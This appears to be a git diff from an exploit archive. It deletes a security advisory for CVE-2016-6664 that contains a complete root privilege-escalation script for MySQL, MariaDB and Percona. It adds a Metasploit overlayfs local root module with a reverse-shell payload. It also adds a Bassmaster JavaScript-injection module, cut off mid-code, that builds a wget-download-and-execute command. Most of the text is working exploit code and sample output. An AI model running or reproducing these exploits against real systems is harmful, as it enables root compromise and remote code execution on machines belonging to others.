+echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
+$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
+$BACKDOORPATH -p
+
+# Job done.
+cleanexit 0
diff --git a/platforms/linux/local/40679.txt b/platforms/linux/local/40679.txt
deleted file mode 100755
index 2fb8105b7..000000000
--- a/platforms/linux/local/40679.txt
+++ /dev/null
@@ -1,531 +0,0 @@
-=============================================
-- Release date: 01.11.2016
-- Discovered by: Dawid Golunski
-- Severity: High
-- CVE-2016-6664 / OCVE-2016-5617
-- http://legalhackers.com
-=============================================
-
-
-I. VULNERABILITY
--------------------------
-
-MariaDB / MySQL / PerconaDB   -   Root Privilege Escalation
-
-MySQL  
-	<= 5.5.51
-	<= 5.6.32
-	<= 5.7.14
-
-MariaDB
-	All current
-
-Percona Server
-	< 5.5.51-38.2
-	< 5.6.32-78-1
-	< 5.7.14-8
-
-Percona XtraDB Cluster
-	< 5.6.32-25.17
-	< 5.7.14-26.17
-	< 5.5.41-37.0
-
-
-II. BACKGROUND
--------------------------
-
-MySQL:
-
-"MySQL is the world's most popular open source database.
-Whether you are a fast growing web property, technology ISV or large
-enterprise, MySQL can cost-effectively help you deliver high performance,
-scalable database applications."
-
-"Many of the world's largest and fastest-growing organizations including
-Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time
-and money powering their high-volume Web sites, business-critical systems and
-packaged software."
-
-http://www.mysql.com/products/
-http://www.mysql.com/why-mysql/
-
---
-
-MariaDB:
-
-"MariaDB is one of the most popular database servers in the world. 
-It’s made by the original developers of MySQL and guaranteed to stay open source. 
-Notable users include Wikipedia, WordPress.com and Google.
-
-MariaDB turns data into structured information in a wide array of applications, 
-ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. 
-MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of 
-storage engines, plugins and many other tools make it very versatile for a wide 
-variety of use cases."
-
-https://mariadb.org/about/
-
---
-
-PerconaDB:
-
-"Percona Server for MySQL is a free, fully compatible, enhanced, open source 
-drop-in replacement for MySQL that provides superior performance, scalability 
-and instrumentation. 
-With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support
-for extremely high-performance hardware delivers excellent performance and reliability."
-
-https://www.percona.com/software/mysql-database/percona-server
-
-
-III. INTRODUCTION
--------------------------
-
-MySQL-based databases including MySQL, MariaDB and PerconaDB are affected
-by a privilege escalation vulnerability which can let attackers who have
-gained access to mysql system user to further escalate their privileges
-to root user allowing them to fully compromise the system.
-The vulnerability stems from unsafe file handling of error logs and
-other files.
-
-
-IV. DESCRIPTION
--------------------------
-
-The error.log file on most default installations of MySQL/PerconaDB/MariaDB
-databases is stored either in /var/log/mysql or /var/lib/mysql directory.
-
-The permissions on the file and directory look as follows:
-
-root@trusty:/var/lib/mysql# ls -la /var/log/mysql
-total 468
-drwxr-s---  2 mysql adm      4096 Sep 11 06:25 .
-drwxrwxr-x 36 root  syslog   4096 Sep 11 06:25 ..
--rw-r-----  1 mysql adm         0 Sep 11 06:25 error.log
-
-root@trusty:/var/lib/mysql# ls -lad /var/log/mysql
-drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql
-
-
-mysqld_safe wrapper that is normally used for starting MySQL daemon and 
-creating/reopening the error.log performs certain unsafe file operations that
-may allow attackers to gain root privileges.
-
-The wrapper script contains a 'while' loop shown below which monitors the mysqld 
-process and performs a restart in case of the process failure.  
-The restart involves re-creation of the error.log file if syslog logging has
-not been configured instead of error log files (file-based logging is the 
-default setting on most installations).
-
-
---------[ mysqld_safe ]--------
-[...]
-
-while true
-do
-  rm -f "$pid_file"     # Some extra safety
-
-  start_time=`date +%M%S`
-
-  eval_log_error "$cmd"
-
-  if [ $want_syslog -eq 0 -a ! -f "$err_log" ]; then
-    touch "$err_log"                    # hypothetical: log was renamed but not
-    chown $user "$err_log"              # flushed yet. we'd recreate it with
-    chmod "$fmode" "$err_log"           # wrong owner next time we log, so set
-  fi                                    # it up correctly while we can!
-
-[...]
-
--------------------------------
-
-As can be seen, the error.log file is created (touch) and chowned to the user
-running the mysqld daemon (typically 'mysql'). 
-
-The operation is vulnerable to a symlink attack.
-
-Attackers who obtained access to mysql account for example through CVE-2016-6663
-vulnerability described at:
-
-http://legalhackers.com/advisories/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-OCVE-2016-5616-Exploit.html
-
-would gain access to /var/log or /var/lib/mysql directories (owned by mysql user) 
-and could therefore easily remove the error.log file and replace it 
-with a symlink to an arbitrary system file which would result in creating in
-arbitrary file on the system with mysql privileges and could be used to escalate
-privileges.
-
-The privilege escalation could be triggered instantly (without the need to wait
-for mysql service restart/reboot) by attackers having 'mysql' account by simply 
-killing the mysqld child process (launched by the mysqld_safe wrapper).
-
-When the mysqld process gets terminated, the wrapper will then re-itertate the 
-loop shown above and immediately create a mysql-owned file in the location 
-specified by the attacker in the symlink thus allowing attackers to quickly
-escalate their privileges.
-
-
-V. PROOF OF CONCEPT EXPLOIT
--------------------------
-
--------[ mysql-chowned.sh ]------
-
-#!/bin/bash -p
-#
-# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
-# mysql-chowned.sh (ver. 1.0)
-#
-# CVE-2016-6664 / OCVE-2016-5617
-#
-# Discovered and coded by:
-#
-# Dawid Golunski
-# dawid[at]legalhackers.com
-#
-# http://legalhackers.com
-#
-#
-# This PoC exploit allows attackers to (instantly) escalate their privileges
-# from mysql system account to root through unsafe error log handling.
-# The exploit requires that file-based logging has been configured (default).
-# To confirm that syslog logging has not been enabled instead use:
-# grep -r syslog /etc/mysql
-# which should return no results.
-#
-# This exploit can be chained with the following vulnerability:
-# CVE-2016-6663 / OCVE-2016-5616
-# which allows attackers to gain access to mysql system account (mysql shell).
-#
-# In case database server has been configured with syslog you may also use:
-# CVE-2016-6662 as an alternative to this exploit.
-#
-# Usage:
-# ./mysql-chowned.sh path_to_error.log 
-#
-# See full advisory for details at:
-#
-# http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
-#
-# Disclaimer:
-# For testing purposes only. Do no harm.
-#
-
-BACKDOORSH="/bin/bash"
-BACKDOORPATH="/tmp/mysqlrootsh"
-PRIVESCLIB="/tmp/privesclib.so"
-PRIVESCSRC="/tmp/privesclib.c"
-SUIDBIN="/usr/bin/sudo"
-
-function cleanexit {
-	# Cleanup 
-	echo -e "\n[+] Cleaning up..."
-	rm -f $PRIVESCSRC
-	rm -f $PRIVESCLIB
-	rm -f $ERRORLOG
-	touch $ERRORLOG
-	if [ -f /etc/ld.so.preload ]; then
-		echo -n > /etc/ld.so.preload
-	fi
-	echo -e "\n[+] Job done. Exiting with code $1 \n"
-	exit $1
-}
-
-function ctrl_c() {
-        echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
-	cleanexit 0
-}
-
-#intro 
-echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n"
-echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
-
-# Args
-if [ $# -lt 1 ]; then
-	echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
-	echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
-	exit 3
-fi
-
-# Priv check
-
-echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
-id | grep -q mysql 
-if [ $? -ne 0 ]; then
-	echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n"
-	exit 3
-fi
-
-# Set target paths
-ERRORLOG="$1"
-if [ ! -f $ERRORLOG ]; then
-	echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n"
-	exit 3
-fi
-echo -e "\n[+] Target MySQL log file set to $ERRORLOG"
-
-# [ Active exploitation ]
-
-trap ctrl_c INT
-# Compile privesc preload library
-echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
-cat <<_solibeof_>$PRIVESCSRC
-#define _GNU_SOURCE
-#include <stdio.h>
-#include <sys/stat.h>
-#include <unistd.h>
-#include <dlfcn.h>
-       #include <sys/types.h>
-       #include <sys/stat.h>
-       #include <fcntl.h>
-
-uid_t geteuid(void) {
-	static uid_t  (*old_geteuid)();
-	old_geteuid = dlsym(RTLD_NEXT, "geteuid");
-	if ( old_geteuid() == 0 ) {
-		chown("$BACKDOORPATH", 0, 0);
-		chmod("$BACKDOORPATH", 04777);
-		//unlink("/etc/ld.so.preload");
-	}
-	return old_geteuid();
-}
-_solibeof_
-/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
-if [ $? -ne 0 ]; then
-	echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
-	cleanexit 2;
-fi
-
-
-# Prepare backdoor shell
-cp $BACKDOORSH $BACKDOORPATH
-echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
-
-# Safety check
-if [ -f /etc/ld.so.preload ]; then
-	echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
-	exit 2
-fi
-
-# Symlink the log file to /etc
-rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
-if [ $? -ne 0 ]; then
-	echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
-	cleanexit 3
-fi
-echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`"
-
-# Wait for MySQL to re-open the logs
-echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n"
-read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER
-if [ "$THE_ANSWER" = "y" ]; then
-	echo -e "Got it. Executing 'killall mysqld' now..."
-	killall mysqld
-fi
-while :; do 
-	sleep 0.1
-	if [ -f /etc/ld.so.preload ]; then
-		echo $PRIVESCLIB > /etc/ld.so.preload
-		rm -f $ERRORLOG
-		break;
-	fi
-done
-
-# /etc/	dir should be owned by mysql user at this point
-# Inject the privesc.so shared library to escalate privileges
-echo $PRIVESCLIB > /etc/ld.so.preload
-echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`"
-echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
-echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
-chmod 755 /etc/ld.so.preload
-
-# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
-echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
-sudo 2>/dev/null >/dev/null
-
-#while :; do 
-#	sleep 0.1
-#	ps aux | grep mysqld | grep -q 'log-error'
-#	if [ $? -eq 0 ]; then
-#		break;
-#	fi
-#done
-
-# Check for the rootshell
-ls -l $BACKDOORPATH
-ls -l $BACKDOORPATH | grep rws | grep -q root
-if [ $? -eq 0 ]; then 
-	echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
-	echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m"
-else
-	echo -e "\n[!] Failed to get root"
-	cleanexit 2
-fi
-
-
-# Execute the rootshell
-echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
-$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
-$BACKDOORPATH -p
-
-# Job done.
-cleanexit 0
-
-
-
-------------EOF------------------
-
-
-Example run
-~~~~~~~~~~~~~~~~
-
-mysql_suid_shell.MYD-4.3$ whoami
-mysql
-
-omysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server
-iU  percona-server-server              5.6.32-78.0-1.xenial              amd64        Percona Server database server
-iF  percona-server-server-5.6          5.6.32-78.0-1.xenial              amd64        Percona Server database server binaries
-
-mysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err 
- 
-MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit 
-mysql-chowned.sh (ver. 1.0)
-
-CVE-2016-6664 / OCVE-2016-5617
-
-Discovered and coded by: 
-
-Dawid Golunski 
-http://legalhackers.com 
-
-[+] Starting the exploit as 
-uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)
-
-[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err
-
-[+] Compiling the privesc shared library (/tmp/privesclib.c)
-
-[+] Backdoor/low-priv shell installed at: 
--rwxr-xr-x 1 mysql attacker 1037528 Nov  1 05:08 /tmp/mysqlrootsh
-
-[+] Symlink created at: 
-lrwxrwxrwx 1 mysql attacker 18 Nov  1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload
-
-[+] Waiting for MySQL to re-open the logs/MySQL service restart...
-Do you want to kill mysqld process to instantly get root? :) ? [y/n] y
-Got it. Executing 'killall mysqld' now...
-
-[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: 
--rw-r----- 1 mysql root 19 Nov  1 05:08 /etc/ld.so.preload
-
-[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
-
-[+] The /etc/ld.so.preload file now contains: 
-/tmp/privesclib.so
-
-[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
--rwsrwxrwx 1 root root 1037528 Nov  1 05:08 /tmp/mysqlrootsh
-
-[+] Rootshell got assigned root SUID perms at: 
--rwsrwxrwx 1 root root 1037528 Nov  1 05:08 /tmp/mysqlrootsh
-
-Got root! The database server has been ch-OWNED !
-
-[+] Spawning the rootshell /tmp/mysqlrootsh now! 
-
-mysqlrootsh-4.3# whoami
-root
-
-mysqlrootsh-4.3# exit
-exit
-
-[+] Cleaning up...
-
-[+] Job done. Exiting with code 0
-
-
-
-Video PoC:
-~~~~~~~~~~~~~
-
-http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
-
-
-VI. BUSINESS IMPACT
--------------------------
-
-Attackers who obtained mysql account through other vulnerabilities
-(such as CVE-2016-6663) could use this exploit to gain root access
-and fully compromise the system.
- 
-VII. SYSTEMS AFFECTED
--------------------------
-
-MySQL  
-	<= 5.5.51
-	<= 5.6.32
-	<= 5.7.14
-
-MariaDB
-	All current
-
-Percona Server
-	< 5.5.51-38.2
-	< 5.6.32-78-1
-	< 5.7.14-8
-
-Percona XtraDB Cluster
-	< 5.6.32-25.17
-	< 5.7.14-26.17
-	< 5.5.41-37.0
- 
-VIII. SOLUTION
--------------------------
-
-Vendors have released patches after private disclosure.
-Update to the latest version of your DBMS.
-
- 
-IX. REFERENCES
--------------------------
-
-http://legalhackers.com
-
-This advisory:
-http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
-
-Exploit source code:
-http://legalhackers.com/exploits/mysql-chowned.sh
-
-CVE-2016-6663 vulnerability which can allow attackers to obtain 'mysql' system account:
-http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
-
-Video PoC:
-http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
-
-CVE-2016-6664
-http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664
-
-http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL
-
-
-
-X. CREDITS
--------------------------
-
-The vulnerability has been discovered by Dawid Golunski
-dawid (at) legalhackers (dot) com
-
-http://legalhackers.com
- 
-XI. REVISION HISTORY
--------------------------
-
-01.11.2016 - Advisory released
- 
-
-XII. LEGAL NOTICES
--------------------------
-
-The information contained within this advisory is supplied "as-is" with
-no warranties or guarantees of fitness of use or otherwise. I accept no
-responsibility for any damage caused by the use or misuse of this information.
\ No newline at end of file
diff --git a/platforms/linux/local/40688.rb b/platforms/linux/local/40688.rb
new file mode 100755
index 000000000..daa62ad3b
--- /dev/null
+++ b/platforms/linux/local/40688.rb
@@ -0,0 +1,293 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'Overlayfs Privilege Escalation',
+        'Description'    => %q{
+          This module attempts to exploit two different CVEs related to overlayfs.
+          CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
+                                            3.16.0-25 (14.10 default) < 3.16.0-41
+                                            3.19.0-18 (15.04 default) < 3.19.0-21
+          CVE-2015-8660:
+              Ubuntu:
+                     3.19.0-18 < 3.19.0-43
+                     4.2.0-18 < 4.2.0-23 (14.04.1, 15.10)
+              Fedora:
+                     < 4.2.8 (vulnerable, un-tested)
+              Red Hat:
+                     < 3.10.0-327 (rhel 6, vulnerable, un-tested)
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die <mike@shorebreaksecurity.com>',  # Module
+            'rebel'                         # Discovery
+          ],
+        'DisclosureDate' => 'Jun 16 2015',
+        'Platform'       => [ 'linux'],
+        'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'Targets'        =>
+          [
+            [ 'CVE-2015-1328', { } ],
+            [ 'CVE-2015-8660', { } ]
+          ],
+        'DefaultTarget'  => 1,
+        'DefaultOptions' =>
+          {
+            'payload' => 'linux/x86/shell/reverse_tcp' # for compatibility due to the need on cve-2015-1328 to run /bin/su
+          },
+        'References'     =>
+          [
+            [ 'EDB', '39166'], # CVE-2015-8660
+            [ 'EDB', '37292'], # CVE-2015-1328
+            [ 'CVE', '2015-1328'],
+            [ 'CVE', '2015-8660']
+          ]
+      ))
+    register_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+      ], self.class)
+  end
+
+  def check
+    def mounts_exist?()
+      vprint_status('Checking if mount points exist')
+      if target.name == 'CVE-2015-1328'
+        if not directory?('/tmp/ns_sploit')
+          vprint_good('/tmp/ns_sploit not created')
+          return true
+        else
+          print_error('/tmp/ns_sploit directory exists.  Please delete.')
+          return false
+        end
+      elsif target.name == 'CVE-2015-8660'
+        if not directory?('/tmp/haxhax')
+          vprint_good('/tmp/haxhax not created')
+          return true
+        else
+          print_error('/tmp/haxhax directory exists.  Please delete.')
+          return false
+        end
+      end
+    end
+
+    def kernel_vuln?()
+      os_id = cmd_exec('grep ^ID= /etc/os-release')
+      case os_id
+      when 'ID=ubuntu'
+        kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
+        case kernel.release.to_s
+        when '3.13.0'
+          if kernel.between?(Gem::Version.new('3.13.0-24-generic'),Gem::Version.new('3.13.0-54-generic'))
+            vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
+            return true
+          else
+            print_error("Kernel #{kernel} is NOT vulnerable")
+            return false
+          end
+        when '3.16.0'
+          if kernel.between?(Gem::Version.new('3.16.0-25-generic'),Gem::Version.new('3.16.0-40-generic'))
+            vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
+            return true
+          else
+            print_error("Kernel #{kernel} is NOT vulnerable")
+            return false
+          end
+        when '3.19.0'
+          if kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-20-generic'))
+            vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
+            return true
+          elsif kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-42-generic'))
+            vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
+            return true
+          else
+            print_error("Kernel #{kernel} is NOT vulnerable")
+            return false
+          end
+        when '4.2.0'
+          if kernel.between?(Gem::Version.new('4.2.0-18-generic'),Gem::Version.new('4.2.0-22-generic'))
+            vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
+            return true
+          else
+            print_error("Kernel #{kernel} is NOT vulnerable")
+            return false
+          end
+        else
+          print_error("Non-vuln kernel #{kernel}")
+          return false
+        end
+      when 'ID=fedora'
+        kernel = Gem::Version.new(cmd_exec('/usr/bin/uname -r').sub(/\.fc.*/, '')) # we need to remove the trailer after .fc
+        # irb(main):008:0> '4.0.4-301.fc22.x86_64'.sub(/\.fc.*/, '')
+        # => "4.0.4-301"
+        if kernel.release < Gem::Version.new('4.2.8')
+          vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660.  Exploitation UNTESTED")
+          return true
+        else
+          print_error("Non-vuln kernel #{kernel}")
+          return false
+        end
+      else
+        print_error("Unknown OS: #{os_id}")
+        return false
+      end
+    end
+
+    if mounts_exist?() && kernel_vuln?()
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    filename = rand_text_alphanumeric(8)
+    executable_path = "#{datastore['WritableDir']}/#{filename}"
+    payloadname = rand_text_alphanumeric(8)
+    payload_path = "#{datastore['WritableDir']}/#{payloadname}"
+
+    def has_prereqs?()
+      gcc = cmd_exec('which gcc')
+      if gcc.include?('gcc')
+        vprint_good('gcc is installed')
+      else
+        print_error('gcc is not installed.  Compiling will fail.')
+      end
+      return gcc.include?('gcc')
+    end
+
+    compile = false
+    if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
+      if has_prereqs?()
+        compile = true
+        vprint_status('Live compiling exploit on system')
+      else
+        vprint_status('Dropping pre-compiled exploit on system')
+      end
+    end
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    def upload_and_chmod(fname, fcontent, cleanup=true)
+      print_status "Writing to #{fname} (#{fcontent.size} bytes)"
+      rm_f fname
+      write_file(fname, fcontent)
+      cmd_exec("chmod +x #{fname}")
+      if cleanup
+        register_file_for_cleanup(fname)
+      end
+    end
+
+    def on_new_session(session)
+      super
+      if target.name == 'CVE-2015-1328'
+        session.shell_command("/bin/su") #this doesnt work on meterpreter?????
+        # we cleanup here instead of earlier since we needed the /bin/su in our new session
+        session.shell_command('rm -f /etc/ld.so.preload')
+        session.shell_command('rm -f /tmp/ofs-lib.so')
+      end
+    end
+
+    if compile
+      begin
+        if target.name == 'CVE-2015-1328'
+          # direct copy of code from exploit-db.  There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
+          # Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary.
+          path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c')
+          fd = ::File.open( path, "rb")
+          cve_2015_1328 = fd.read(fd.stat.size)
+          fd.close
+
+          # pulled out from 1328.c's LIB define
+          path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c')
+          fd = ::File.open( path, "rb")
+          ofs_lib = fd.read(fd.stat.size)
+          fd.close
+        else
+          # direct copy of code from exploit-db.  There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
+          path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c')
+          fd = ::File.open( path, "rb")
+          cve_2015_8660 = fd.read(fd.stat.size)
+          fd.close
+        end
+      rescue
+        compile = false #hdm said external folder is optional and all module should run even if external is deleted.  If we fail to load, default to binaries
+      end
+    end
+
+
+    if compile
+      if target.name == 'CVE-2015-1328'
+        cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/,
+                            "execl(\"#{payload_path}\",\"#{payloadname}\",NULL);")
+        upload_and_chmod("#{executable_path}.c", cve_2015_1328)
+        ofs_path = "#{datastore['WritableDir']}/ofs-lib"
+        upload_and_chmod("#{ofs_path}.c", ofs_lib)
+        cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file
+        register_file_for_cleanup("#{ofs_path}.c")
+      else
+        cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/,
+                            "os.execl('#{payload_path}','#{payloadname}')")
+        upload_and_chmod("#{executable_path}.c", cve_2015_8660)
+      end
+      vprint_status("Compiling #{executable_path}.c")
+      cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile
+      register_file_for_cleanup(executable_path)
+    else
+      if target.name == 'CVE-2015-1328'
+        path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', '1328')
+        fd = ::File.open( path, "rb")
+        cve_2015_1328 = fd.read(fd.stat.size)
+        fd.close
+        upload_and_chmod(executable_path, cve_2015_1328)
+
+        path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so')
+        fd = ::File.open( path, "rb")
+        ofs_lib = fd.read(fd.stat.size)
+        fd.close
+        ofs_path = "#{datastore['WritableDir']}/ofs-lib"
+        # dont auto cleanup or else it happens too quickly and we never escalate ourprivs
+        upload_and_chmod("#{ofs_path}.so", ofs_lib, false)
+
+        # overwrite with the hardcoded variable names in the compiled versions
+        payload_filename = 'lXqzVpYN'
+        payload_path = '/tmp/lXqzVpYN'
+      else
+        path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660')
+        fd = ::File.open( path, "rb")
+        cve_2015_8660 = fd.read(fd.stat.size)
+        fd.close
+        upload_and_chmod(executable_path, cve_2015_8660)
+        # overwrite with the hardcoded variable names in the compiled versions
+        payload_filename = '1H0qLaq2'
+        payload_path = '/tmp/1H0qLaq2'
+      end
+    end
+
+    upload_and_chmod(payload_path, generate_payload_exe)
+    vprint_status('Exploiting...')
+    output = cmd_exec(executable_path)
+    output.each_line { |line| vprint_status(line.chomp) }
+  end
+end
\ No newline at end of file
diff --git a/platforms/linux/remote/40689.rb b/platforms/linux/remote/40689.rb
new file mode 100755
index 000000000..0ef65aad6
--- /dev/null
+++ b/platforms/linux/remote/40689.rb
@@ -0,0 +1,168 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution',
+      'Description'    => %q{
+        This module exploits an un-authenticated code injection vulnerability in the bassmaster
+        nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an
+        attacker to dynamically execute JavaScript code on the server side using an eval.
+
+        Note that the code uses a '\x2f' character so that we hit the match on the regex.
+      },
+      'Author'         =>
+        [
+          'mr_me <mr_me@offensive-security.com>',      # msf
+          'Jarda Kotesovec'                            # original bug finder
+        ],
+      'References'  =>
+        [
+          [ 'CVE', '2014-7205'],
+          [ 'URL', 'https://nodesecurity.io/advisories/bassmaster_js_injection'],        # nodejs advisory
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'    => ['linux', 'bsd'],                                                 # binary > native JavaScript
+      'Arch'        => [ARCH_X86, ARCH_X86_64],
+      'Privileged'     => false,
+      'Targets'     =>
+        [
+          [ 'Bassmaster <= 1.5.1', {} ]                                                  # Other versions are also affected
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Nov 1 2016'))
+    register_options(
+      [
+        Opt::RPORT(8080),                                                                # default port for the examples/batch.js file
+        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/batch"]), # default route for the examples/batch.js file
+        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
+      ], self.class)
+  end
+
+  def check
+
+    # So if we can append an encapsulated string into the body
+    # we know that we can execute arbitrary JavaScript code
+    rando  = rand_text_alpha(8+rand(8))
+    check  = "+'#{rando}'"
+
+    # testing
+    requests = [
+      {:method => "get", :path => "/profile"},
+      {:method => "get", :path => "/item"},
+      {:method => "get", :path => "/item/$1.id#{check}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
+    ]
+
+    post = {:requests => requests}
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['URIPATH']),
+      'ctype' => 'application/json',
+      'data'   => post.to_json
+    })
+
+    # default example app
+    if res and res.code == 200 and res.body =~ /#{rando}/
+      return CheckCode::Vulnerable
+
+    # non-default app
+    elsif res and res.code == 500 and res.body =~ /#{rando}/
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  def send_payload
+    @bd = rand_text_alpha(8+rand(8))
+    pn  = rand_text_alpha(8+rand(8))
+    register_file_for_cleanup("/tmp/#{@bd}")
+    cmd  = "wget #{@service_url} -O \\x2ftmp\\x2f#{@bd};"
+    cmd << "chmod 755 \\x2ftmp\\x2f#{@bd};"
+    cmd << "\\x2ftmp\\x2f#{@bd}"
+    pay = ";require('child_process').exec('#{cmd}');"
